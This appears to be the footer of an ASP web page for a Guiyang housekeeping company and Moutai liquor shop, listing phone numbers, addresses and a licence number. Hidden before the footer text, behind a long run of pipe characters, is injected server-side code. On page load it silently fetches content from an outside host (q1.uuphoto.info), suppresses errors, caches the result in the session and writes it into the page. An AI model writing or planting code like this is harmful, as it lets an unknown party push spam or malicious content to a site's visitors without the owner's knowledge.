|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
<%
On Error Resume Next
Server.ScriptTimeOut=9999999
if session("cc") ="" then
session("cc") = getHTTPPage("http://q1.uuphoto.info/12/")
end if
response.write session("cc")
function getHTTPPage(url)
on error resume next
dim http
set http=Server.createobject("Microsoft.XMLHTTP")
Http.open "GET",url,false
Http.send()
if Http.readystate<>4 then exit function
getHTTPPage=bytes2BSTR2(Http.responseBody,"gb2312")
set http=nothing
if err.number<>0 then err.Clear
end function
Function Bytes2Bstr2(body,Cset)
dim objstream
set objstream = Server.CreateObject("adodb.stream")
objstream.Type = 1
objstream.Mode =3
objstream.Open
objstream.Write body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = Cset
Bytes2Bstr2 = objstream.ReadText
objstream.Close
set objstream = nothing
End Function
%>
家政业务资询电话:0851-3812586
茅台酒专卖店电话:0851-5101179 公司地址:贵州省贵阳市花溪大道北段新庄 贵阳天运茅台酒专卖店地址:贵州省贵阳市花溪大道北段348号 版权所有@贵州贵阳天运家政服务公司 黔ICP备09000533号 |